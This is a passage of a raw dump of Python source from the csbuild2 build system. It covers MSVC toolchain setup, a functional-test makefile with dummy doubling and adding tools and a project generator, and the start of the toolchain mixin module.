msvcSubsystemVersion(self):\n\t\t\"\"\"\n\t\t:return: Returns the version number to use with the subsystem argument.\n\t\t:rtype: tuple[int, int]\n\t\t\"\"\"\n\t\treturn self._msvcSubsystemVersion\n\n\n\t@property\n\tdef vcvarsall(self):\n\t\t\"\"\"\n\t\t:return: Returns the Vcvarsall instance.\n\t\t:rtype: :class:`csbuild.tools.common.msvc_tool_base.Vcvarsall`\n\t\t\"\"\"\n\t\treturn self._vcvarsall\n\n\n\t@staticmethod\n\t@TypeChecked(version=str)\n\tdef SetVisualStudioVersion(version):\n\t\t\"\"\"\n\t\tSet the version of Visual Studio to use.\n\n\t\t:param version: Visual studio version\n\t\t\t\"10\" => Visual Studio 2010\n\t\t\t\"11\" => Visual Studio 2012\n\t\t\t\"12\" => Visual Studio 2013\n\t\t\t\"14\" => Visual Studio 2015\n\t\t\t\"15\" => Visual Studio 2017\n\t\t\t\"16\" => Visual Studio 2019\n\t\t:type version: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"vsVersion\", version)\n\n\n\t@staticmethod\n\t@TypeChecked(version=str)\n\tdef SetWindowsSdkVersion(version):\n\t\t\"\"\"\n\t\tSet the Windows SDK version to build against (only applies to Visual Studio \"14.0\" and up).\n\n\t\t:param version: Windows SDK version (e.g., \"8.1\", \"10.0.15063.0\", etc)\n\t\t:type version: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"winSdkVersion\", version)\n\n\n\t@staticmethod\n\t@TypeChecked(subsystem=str)\n\tdef SetMsvcSubsystem(subsystem):\n\t\t\"\"\"\n\t\tSet the MSVC linker subsystem argument.\n\n\t\t:param subsystem: MSVC linker subsystem argument.\n\t\t:type subsystem: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"msvcSubsystem\", subsystem)\n\n\n\t@staticmethod\n\t@TypeChecked(major=int, minor=int)\n\tdef SetMsvcSubsystemVersion(major, minor):\n\t\t\"\"\"\n\t\tSet the version number to use with the subsystem argument.\n\n\t\t:param major: Subsystem major version.\n\t\t:type major: int\n\n\t\t:param minor: Subsystem minor version.\n\t\t:type minor: int\n\t\t\"\"\"\n\t\tif isinstance(major, int) and isinstance(minor, int):\n\t\t\tcsbuild.currentPlan.SetValue(\"msvcSubsystemVersion\", (major, minor))\n\n\n\tdef SetupForProject(self, project):\n\t\tTool.SetupForProject(self, project)\n\t\tcurrentArch = csbuild.GetSystemArchitecture()\n\t\tsupportedSystemArchs = {\n\t\t\t\"x86\",\n\t\t\t\"x64\",\n\t\t\t\"arm\",\n\t\t}\n\n\t\t# Msvc can only be run from a certain set of supported architectures.\n\t\tassert currentArch in supportedSystemArchs, \\\n\t\t\t'Invalid system architecture \"{}\"; msvc tools can only be run on the following architectures: {}'.format(currentArch, supportedSystemArchs)\n\n\t\t# The argument values here are directly used by vcvarsall.bat prior to Visual Studio 2017,\n\t\t# however we still use them internally for mapping the environment data for the selected\n\t\t# version of Visual Studio and determining valid build targets.\n\t\targs = {\n\t\t\t\"x64\": {\n\t\t\t\t\"x64\": \"amd64\",\n\t\t\t\t\"x86\": \"amd64_x86\",\n\t\t\t\t\"arm\": \"amd64_arm\",\n\t\t\t},\n\t\t\t\"x86\": {\n\t\t\t\t\"x64\": \"x86_amd64\",\n\t\t\t\t\"x86\": \"x86\",\n\t\t\t\t\"arm\": \"x86_arm\",\n\t\t\t},\n\t\t\t\"arm\": {\n\t\t\t\t\"x64\": None,\n\t\t\t\t\"x86\": None,\n\t\t\t\t\"arm\": \"arm\",\n\t\t\t},\n\t\t}\n\n\t\tvcvarsArch = args[currentArch][project.architectureName]\n\n\t\tassert vcvarsArch is not None, \"Building for {} on {} is unsupported.\".format(project.architectureName, currentArch)\n\n\t\t# Only run vcvarsall.bat if we haven't already for the selected architecture.\n\t\tif vcvarsArch not in Vcvarsall.Instances:\n\t\t\tarchInfo = _ArchitectureInfo(currentArch, project.architectureName, vcvarsArch, self._winSdkVersion, self._enableUwp)\n\n\t\t\tself._findInstallations()\n\t\t\tself._setupEnvironment(archInfo)\n\n\t\t# Retrieve the memoized data.\n\t\tself._vcvarsall = Vcvarsall.Instances[vcvarsArch]\n\n\n\tdef _findInstallations(self):\n\t\tif not self._allInstalls:\n\t\t\tpost2017Installs = _InstallDataPost2017.FindInstallations()\n\t\t\tpre2017Installs = _InstallDataPre2017.FindInstallations()\n\n\t\t\t# The installs should be sorted newest to oldest, so make sure the\n\t\t\t# post-2017 installs come before the pre-2017 installs.\n\t\t\tself._allInstalls = post2017Installs + pre2017Installs\n\n\n\tdef _setupEnvironment(self, archInfo):\n\t\tvcvarsall = None\n\n\t\tif not self._selectedInstall:\n\t\t\tinstallsToCheck = []\n\n\t\t\tfor installData in self._allInstalls:\n\t\t\t\tlog.Info(\"Found installation for {}\".format(installData.displayName))\n\n\t\t\t\tif self._vsVersion:\n\t\t\t\t\t# Only consider installs matching the version provided by the user.\n\t\t\t\t\tif str(installData.version) == self._vsVersion:\n\t\t\t\t\t\tinstallsToCheck.append(installData)\n\t\t\t\telse:\n\t\t\t\t\t# No version provided by the user, so consider all installs.\n\t\t\t\t\tinstallsToCheck.append(installData)\n\n\t\t\t# Make sure we actually have something to check.\n\t\t\tassert installsToCheck, \\\n\t\t\t\t\"No installations of Visual Studio were detected{}.\".format(\n\t\t\t\t\t\" matching version {}\".format(self._vsVersion) if self._vsVersion else \"\"\n\t\t\t\t)\n\n\t\t\t# Use the first install that provides valid environment data.\n\t\t\tfor installData in installsToCheck:\n\t\t\t\tvcvarsall = installData.GetEnvironment(archInfo)\n\n\t\t\t\tif vcvarsall:\n\t\t\t\t\tself._selectedInstall = installData\n\t\t\t\t\tlog.Build(\n\t\t\t\t\t\t\"Building for {}{}\".format(\n\t\t\t\t\t\t\tself._selectedInstall.displayName,\n\t\t\t\t\t\t\t\" using Windows SDK {}\".format(vcvarsall.winSdkVersion) if vcvarsall.winSdkVersion else \"\"\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\t\t\t\t\tbreak\n\n\t\telse:\n\t\t\t# A version of Visual Studio has already been selected, so get its environment data for the current architecture.\n\t\t\tvcvarsall = self._selectedInstall.GetEnvironment(archInfo)\n\n\t\t# Make sure the environment data is valid.\n\t\tassert vcvarsall, \\\n\t\t\t\"Failed to get environment data for {} (version {}).\".format(\n\t\t\t\tself._selectedInstall.displayName,\n\t\t\t\tself._selectedInstall.version\n\t\t\t)\n\n\t\tVcvarsall.Instances[archInfo.vcvarsArch] = vcvarsall\n" }, { "alpha_fraction": 0.731321394443512, "alphanum_fraction": 0.7320548892021179, "avg_line_length": 31.906896591186523, "blob_id": "94b3f8f1858224add737760072c3180b24d6094d", "content_id": "773822516357b55d1fdc46d3c930b1877560f3b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9543, "license_type": "no_license", "max_line_length": 125, "num_lines": 290, "path": "/functional_tests/project_generator_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nfrom csbuild.toolchain import Tool, SolutionGenerator\nimport os\n\nfooSet = False\nbarSet = False\nquxSet = False\nquuxset = False\n\ncsbuild.SetIntermediateDirectory(\"intermediate\")\ncsbuild.SetOutputDirectory(\"out\")\n\nclass AddDoubles(Tool):\n\t\"\"\"\n\tSimple base class to test global toolchain contexts\n\t\"\"\"\n\tsupportedArchitectures=None\n\tdef __init__(self, projectSettings):\n\t\tassert \"foo\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!foo\".format(id(AddDoubles)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tself._foo = projectSettings.get(\"foo\", False)\n\n\t\tassert \"bar\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!bar\".format(id(AddDoubles)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tself._bar = projectSettings.get(\"bar\", False)\n\n\t\tTool.__init__(self, projectSettings)\n\n\t@staticmethod\n\tdef SetFoo():\n\t\t\"\"\"\n\t\tSet foo to true, yay testing.\n\t\t\"\"\"\n\t\tglobal fooSet\n\t\tassert fooSet is False\n\t\tfooSet = True\n\t\tcsbuild.currentPlan.SetValue(\"foo\", True)\n\n\t@staticmethod\n\tdef SetBar():\n\t\t\"\"\"\n\t\tSet bar to true, yay testing.\n\t\t\"\"\"\n\t\tglobal barSet\n\t\tassert barSet is False\n\t\tbarSet = True\n\t\tcsbuild.currentPlan.SetValue(\"bar\", True)\n\nclass Doubler(AddDoubles):\n\t\"\"\"\n\tSimple tool that opens a file, doubles its contents numerically, and writes a new file.\n\t\"\"\"\n\tinputFiles = {\".first\"}\n\n\toutputFiles = {\".second\"}\n\n\tdef Run(self, inputProject, inputFile):\n\t\tassert self._foo is True\n\t\tassert self._bar is True\n\t\twith open(inputFile.filename, \"r\") as f:\n\t\t\tvalue = int(f.read())\n\t\tvalue *= 2\n\t\toutFile = os.path.join(inputProject.intermediateDir, os.path.splitext(os.path.basename(inputFile.filename))[0] + \".second\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(str(value))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\nclass Adder(AddDoubles):\n\t\"\"\"\n\tSimple tool that opens multiple doubled files and adds their contents together numerically, outputting a final file.\n\t\"\"\"\n\tinputGroups = {\".second\"}\n\toutputFiles = {\".third\"}\n\n\tdef __init__(self, projectSettings):\n\t\tassert \"qux\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!qux\".format(id(Adder)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tself._qux = projectSettings.get(\"qux\", False)\n\n\t\tAddDoubles.__init__(self, projectSettings)\n\n\t@staticmethod\n\tdef SetQux():\n\t\t\"\"\"\n\t\tSet qux to true, yay testing.\n\t\t\"\"\"\n\t\tglobal quxSet\n\t\tassert quxSet is False\n\t\tquxSet = True\n\t\tcsbuild.currentPlan.SetValue(\"qux\", True)\n\n\t@staticmethod\n\tdef SetQuux():\n\t\t\"\"\"\n\t\tDoes nothing.\n\t\t\"\"\"\n\t\tpass\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\tassert self._foo is True\n\t\tassert self._bar is True\n\t\tassert self._qux is True\n\t\tvalue = 0\n\t\tfor inputFile in inputFiles:\n\t\t\twith open(inputFile.filename, \"r\") as f:\n\t\t\t\tvalue += int(f.read())\n\t\toutFile = os.path.join(inputProject.outputDir, inputProject.outputName + \".third\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(str(value))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\nclass DummyProjectGenerator(Tool):\n\t\"\"\"Dummy project generator\"\"\"\n\tinputGroups = {\".first\"}\n\toutputFiles = {\".proj\"}\n\n\tdef __init__(self, projectSettings):\n\t\tself._projectSettings = projectSettings\n\n\t\tself._foo = projectSettings.get(\"foo\", False)\n\t\tself._bar = projectSettings.get(\"bar\", False)\n\t\tself._qux = projectSettings.get(\"qux\", False)\n\t\tself._quux = projectSettings.get(\"quux\", False)\n\n\t\tTool.__init__(self, projectSettings)\n\n\n\tdef SetupForProject(self, project):\n\t\tprojectSettings = self._projectSettings\n\n\t\t# These checks done here because information is needed from the project to know what the values should be\n\t\t# Project settings should NEVER be read outside of __init__ in production code. It will not work as expected.\n\t\tassert \"foo\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!foo\".format(id(DummyProjectGenerator)) in projectSettings._settingsDict #pylint: disable=protected-access\n\n\t\tif project.name == \"TestProject\":\n\t\t\tif project.toolchainName == \"AddDoubles\":\n\t\t\t\tif project.targetName == \"release\":\n\t\t\t\t\tassert \"bar\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\t\t\t\tassert \"{}!bar\".format(id(DummyProjectGenerator)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\t\t\tassert \"qux\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\t\t\tassert \"{}!qux\".format(id(DummyProjectGenerator)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\t\t\tassert \"quux\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\t\t\tassert \"{}!quux\".format(id(DummyProjectGenerator)) in projectSettings._settingsDict #pylint: disable=protected-access\n\n\t@staticmethod\n\tdef SetQuux():\n\t\t\"\"\"\n\t\tSet quux to true, yay testing.\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"quux\", True)\n\n\t@staticmethod\n\tdef SetFoo():\n\t\t\"\"\"\n\t\tSet foo to true, yay testing.\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"foo\", True)\n\n\t@staticmethod\n\tdef SetQux():\n\t\t\"\"\"\n\t\tSet qux to true, yay testing.\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"qux\", True)\n\n\t@staticmethod\n\tdef SetBar():\n\t\t\"\"\"\n\t\tSet bar to true, yay testing.\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"bar\", True)\n\n\t@property\n\tdef foo(self): # pylint: disable=blacklisted-name\n\t\t\"\"\"Get foo\"\"\"\n\t\treturn self._foo\n\n\t@property\n\tdef bar(self): # pylint: disable=blacklisted-name\n\t\t\"\"\"Get bar\"\"\"\n\t\treturn self._bar\n\n\t@property\n\tdef qux(self):\n\t\t\"\"\"Get qux\"\"\"\n\t\treturn self._qux\n\n\t@property\n\tdef quux(self):\n\t\t\"\"\"Get quux\"\"\"\n\t\treturn self._quux\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\tassert self._foo is True\n\t\tassert self._bar is (inputProject.targetName == \"release\")\n\t\tassert self._qux is True\n\t\tassert self._quux is True\n\t\toutStr = \"\\n\".join([inputFile.filename for inputFile in inputFiles])\n\t\toutFile = os.path.join(csbuild.GetSolutionPath(), inputProject.outputName + \"_\" + inputProject.targetName + \".proj\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(outStr)\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\nclass DummySolutionGenerator(SolutionGenerator):\n\t\"\"\"Dummy solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects):\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\toutStr = \"\"\n\t\tfor proj in projects:\n\t\t\t# I do not know why pylint thinks inputFile is a str.\n\t\t\toutStr += \"\\n\".join(sorted([inputFile.filename for inputFile in proj.inputFiles[\".proj\"]])) # pylint: disable=no-member\n\t\t\tprint(proj.toolchain.Tool(DummyProjectGenerator))\n\t\t\tprint(proj.toolchain.Tool(DummyProjectGenerator).foo)\n\t\t\tassert proj.toolchain.Tool(DummyProjectGenerator).foo is True\n\t\t\tassert proj.toolchain.Tool(DummyProjectGenerator).bar is (proj.targetName == \"release\")\n\t\t\tassert proj.toolchain.Tool(DummyProjectGenerator).qux is True\n\t\t\tassert proj.toolchain.Tool(DummyProjectGenerator).quux is True\n\n\t\toutFile = os.path.join(outputDir, solutionName + \".sln\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(outStr)\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\ncsbuild.RegisterToolchain(\"AddDoubles\", \"\", Doubler)\ncsbuild.RegisterProjectGenerator(\"DummyGenerator\", [DummyProjectGenerator], DummySolutionGenerator)\ncsbuild.SetDefaultToolchain(\"AddDoubles\")\n\ncsbuild.SetFoo()\n\nwith csbuild.Project(\"TestProject\", \".\"):\n\twith csbuild.Toolchain(\"AddDoubles\"):\n\t\tcsbuild.AddTool(Adder)\n\t\tcsbuild.SetQux()\n\t\twith csbuild.Target(\"release\"):\n\t\t\tcsbuild.SetBar()\n\t\tcsbuild.Tool(Adder).SetQuux()\n\tcsbuild.SetOutput(\"Foo\", csbuild.ProjectType.Application)\n" }, { "alpha_fraction": 0.6746160387992859, "alphanum_fraction": 0.6824505925178528, "avg_line_length": 34.89369583129883, "blob_id": "b8b9a9b6077fd459ba6908bee13088a9ce54d67d", "content_id": "1eb255a28de269623ec149374b57db7d0f84dc96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58076, "license_type": "no_license", "max_line_length": 160, "num_lines": 1618, "path": "/csbuild/toolchain/toolchain.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: toolchain\n\t:synopsis: Mixin class to join tools together\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport contextlib\nimport threading\nimport sys\nimport types\n\nfrom .._utils import shared_globals\nfrom . import Tool as ToolClass, CompileChecker\nfrom .._utils import PlatformString, ordered_set\nfrom .._utils.decorators import TypeChecked\nfrom .._utils.string_abc import String\nfrom .._testing import testcase\nfrom .. import perf_timer\n\ncurrentToolId = None\n\nif sys.version_info[0] >= 3:\n\t_typeType = type\n\t_classType = type\nelse:\n\t# pylint: disable=invalid-name\n\t_typeType = types.TypeType\n\t_classType = types.ClassType\n\nstaticInitsRun = set()\noverloadedStaticInits = set()\n\nclass InvalidFunctionCall(Exception):\n\t\"\"\"\n\tException indicating an invalid function call.\n\t\"\"\"\n\tpass\n\nclass Toolchain(object):\n\t\"\"\"\n\tCreates a toolchain mixin class from the given list of classes.\n\tThis mixin class has the following special behaviors:\n\n\t* If two classes both inherit from the same class, variables initialized in the base class's __init__ will be shared\n\t between all subclasses\n\t* Private functions and data members are specific to the class they're defined in, even if they share a name in\n\t two different classes - the code will intelligently call the correct (intended) function based on the location\n\t it's called from\n\t* Public functions will be called as a group - all tools that have a certain function on it will have that function\n\t called when the toolchain's function of that name is called.\n\n\t:param projectSettings: Settings to initialize tool classes with\n\t:type projectSettings: dict\n\t:param classes: list of Tool classes\n\t:type classes: class inherited from Tool\n\t:param kwargs: Optional arguments:\n\t *runInit* to disable initialization so that static methods may be called\n\t\ton platforms where full initialization may not work.\n\t\t*checkers* to provide a mapping of extension to CompileChecker instance\n\t:type kwargs: runInit: bool\n\t:return: generated Toolchain class\n\t:rtype: Toolchain\n\t\"\"\"\n\tdef __new__(cls, projectSettings, *classes, **kwargs):\n\t\twith perf_timer.PerfTimer(\"Toolchain creation\"):\n\t\t\tfor cls in classes:\n\t\t\t\tassert issubclass(cls, ToolClass), \"Toolchains must be composed only of classes that inherit from Tool\"\n\n\t\t\t# Python 2 compatibility... python 3 allows keyword arguments after *args, but python 2 doesn't\n\t\t\trunInit = kwargs.pop(\"runInit\", True)\n\t\t\tcheckers = kwargs.pop(\"checkers\", {})\n\t\t\tassert not kwargs, \"Unsupported arguments to toolchain init: {}\".format(kwargs.keys())\n\t\t\tdefaultChecker = CompileChecker()\n\n\t\t\twith perf_timer.PerfTimer(\"Local data init\"):\n\t\t\t\t# Keep track of some state data...\n\t\t\t\tclass _classTrackrClass(object):\n\t\t\t\t\tdef __init__(self):\n\t\t\t\t\t\t# List of classes that have had __init__ called on them.\n\t\t\t\t\t\t# Since base class data is shared, we don't want to initialize them more than once\n\t\t\t\t\t\tself.initialized = set()\n\n\t\t\t\t\t\t# List of inits that are already overloaded so we don't wrap them multiple times\n\t\t\t\t\t\tself.overloadedInits = set()\n\n\t\t\t\t\t\t# Mutable list of classes\n\t\t\t\t\t\tself.classes = ordered_set.OrderedSet()\n\n\t\t\t\t\t\t# Mutable list of bases\n\t\t\t\t\t\tself.bases = ordered_set.OrderedSet()\n\n\t\t\t\t\t\t# List of paths by which files can go through tools at various starting points.\n\t\t\t\t\t\tself.paths = {}\n\n\t\t\t\t\t\t# List of reachable extensions given currently active or pending tools\n\t\t\t\t\t\tself.reachability = {}\n\n\t\t\t\t\t\t# List of null input tools that have been processed\n\t\t\t\t\t\tself.activeClasses = ordered_set.OrderedSet()\n\n\t\t\t\t\t\t# List of compile checkers\n\t\t\t\t\t\tself.checkers = {}\n\n\t\t\t\t_classTrackr = _classTrackrClass()\n\t\t\t\t_classTrackr.checkers = checkers\n\n\t\t\t\t_threadSafeClassTrackr = threading.local()\n\n\t\t\t\t# The last class to have a public function called on it\n\t\t\t\t# This is used to resolve private function calls and private member variable access - only\n\t\t\t\t# those elements that exist on this class or its bases will be visible\n\t\t\t\t_threadSafeClassTrackr.lastClass = None\n\n\t\t\t\t# Limited class lookup table. When non-empty, only classes in this set will be\n\t\t\t\t# visible when performing member lookups\n\t\t\t\t_threadSafeClassTrackr.limit = ordered_set.OrderedSet()\n\n\t\t\t\tdef _getLastClass():\n\t\t\t\t\tif hasattr(_threadSafeClassTrackr, \"lastClass\"):\n\t\t\t\t\t\treturn _threadSafeClassTrackr.lastClass\n\t\t\t\t\treturn None\n\n\t\t\t\tdef _getLimit():\n\t\t\t\t\tif hasattr(_threadSafeClassTrackr, \"limit\"):\n\t\t\t\t\t\treturn _threadSafeClassTrackr.limit\n\t\t\t\t\treturn ordered_set.OrderedSet()\n\n\t\t\t\[email protected]\n\t\t\t\tdef Use(cls): # pylint: disable=missing-yield-doc,missing-yield-type-doc\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tSimple context manager to simplify scope management for the class tracker\n\t\t\t\t\t:param cls: The class to manage, or 'self' to access self variables\n\t\t\t\t\t:type cls: class, or Toolchain instance\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tglobal currentToolId\n\t\t\t\t\tlastToolId = currentToolId\n\t\t\t\t\tcurrentToolId = [id(x) for x in cls.mro()]\n\t\t\t\t\toldClass = _getLastClass()\n\t\t\t\t\t_threadSafeClassTrackr.lastClass = cls\n\t\t\t\t\ttry:\n\t\t\t\t\t\tyield\n\t\t\t\t\tfinally:\n\t\t\t\t\t\t_threadSafeClassTrackr.lastClass = oldClass\n\t\t\t\t\t\tcurrentToolId = lastToolId\n\n\t\t\t\t# Replace each class's __init__ function with one that will prevent double-init\n\t\t\t\t# and will ensure that _threadSafeClassTrackr.lastClass is set properly so that variables\n\t\t\t\t# initialize with the correct visibility\n\t\t\t\tdef _setinit(base):\n\t\t\t\t\t# Use a variable on the function to prevent us from wrapping this over and over\n\t\t\t\t\tif base.__init__ not in _classTrackr.overloadedInits:\n\t\t\t\t\t\toldinit = base.__init__\n\n\t\t\t\t\t\tfor superbase in list(base.mro())[1:]:\n\t\t\t\t\t\t\tif superbase is object:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\tif hasattr(oldinit, '__func__'):\n\t\t\t\t\t\t\t\tif hasattr(superbase.__init__, '__func__') and oldinit.__func__ is superbase.__init__.__func__:\n\t\t\t\t\t\t\t\t\tbase.__oldInit__ = oldinit\n\t\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif not hasattr(superbase.__init__, '__func__') and oldinit is superbase.__init__:\n\t\t\t\t\t\t\t\t\tbase.__oldInit__ = oldinit\n\t\t\t\t\t\t\t\t\treturn\n\n\t\t\t\t\t\tdef _initwrap(self, *args, **kwargs):\n\t\t\t\t\t\t\t# Don't re-init if already initialized\n\t\t\t\t\t\t\tif base not in _classTrackr.initialized:\n\t\t\t\t\t\t\t\t_classTrackr.initialized.add(base)\n\t\t\t\t\t\t\t\t# Track the current class for __setattr__\n\t\t\t\t\t\t\t\twith Use(base):\n\t\t\t\t\t\t\t\t\toldinit(self, *args, **kwargs)\n\n\t\t\t\t\t\t# Replace existing init and set the memoization value\n\t\t\t\t\t\tbase.__init__ = _initwrap\n\t\t\t\t\t\tbase.__oldInit__ = oldinit\n\t\t\t\t\t\t_classTrackr.overloadedInits.add(base.__init__)\n\t\t\t\t\tif base.__static_init__ not in overloadedStaticInits:\n\t\t\t\t\t\toldstaticinit = base.__static_init__\n\n\t\t\t\t\t\tfor superbase in list(base.mro())[1:]:\n\t\t\t\t\t\t\tif superbase is object:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\tif oldstaticinit is superbase.__static_init__:\n\t\t\t\t\t\t\t\treturn\n\n\t\t\t\t\t\t@staticmethod\n\t\t\t\t\t\tdef _staticinitwrap(*args, **kwargs):\n\t\t\t\t\t\t\t# Don't re-init if already initialized\n\t\t\t\t\t\t\tif oldstaticinit not in staticInitsRun:\n\t\t\t\t\t\t\t\tstaticInitsRun.add(oldstaticinit)\n\t\t\t\t\t\t\t\toldstaticinit(*args, **kwargs)\n\t\t\t\t\t\tbase.__static_init__ = _staticinitwrap\n\t\t\t\t\t\tbase.__old_static_init__ = oldstaticinit\n\t\t\t\t\t\tbase.__old_static_init_owner__ = base\n\t\t\t\t\t\toverloadedStaticInits.add(base.__static_init__)\n\n\t\t\t# Collect a list of all the base classes\n\t\t\tfor cls in classes:\n\t\t\t\tassert (cls.inputFiles is None or cls.inputFiles or cls.inputGroups or cls.crossProjectInputGroups), \"Tool {} has no inputs set\".format(cls.__name__)\n\t\t\t\tassert cls.outputFiles, \"Tool {} has no outputs set\".format(cls.__name__)\n\t\t\t\t# mro() - \"method resolution order\", which happens to also be a list of all classes in the inheritance\n\t\t\t\t# tree, including the class itself (but we only care about its base classes\n\t\t\t\tfor base in cls.mro():\n\t\t\t\t\tif base is cls:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t# Replace the base class's __init__ so we can track members properly\n\t\t\t\t\tif runInit:\n\t\t\t\t\t\t_setinit(base)\n\t\t\t\t\tif base is ToolClass:\n\t\t\t\t\t\tbreak\n\t\t\t\t\t_classTrackr.bases.add(base)\n\n\t\t\t# Create paths for each tool, showing the total path a file will take from this tool to its final output\n\t\t\tfor cls in classes:\n\t\t\t\tneedAnotherPass = True\n\t\t\t\tpath = ordered_set.OrderedSet()\n\t\t\t\twhile needAnotherPass:\n\t\t\t\t\tneedAnotherPass = False\n\t\t\t\t\toutputs = set(cls.outputFiles)\n\t\t\t\t\tfor cls2 in classes:\n\t\t\t\t\t\tif cls2 is cls:\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tif cls2 in path:\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tif cls2.inputFiles is not None:\n\t\t\t\t\t\t\tfor inputFile in cls2.inputFiles:\n\t\t\t\t\t\t\t\tif inputFile in outputs:\n\t\t\t\t\t\t\t\t\tpath.add(cls2)\n\t\t\t\t\t\t\t\t\toutputs.update(cls2.outputFiles)\n\t\t\t\t\t\t\t\t\tneedAnotherPass = True\n\t\t\t\t\t\tfor inputFile in cls2.inputGroups:\n\t\t\t\t\t\t\tif inputFile in outputs:\n\t\t\t\t\t\t\t\tpath.add(cls2)\n\t\t\t\t\t\t\t\toutputs.update(cls2.outputFiles)\n\t\t\t\t\t\t\t\tneedAnotherPass = 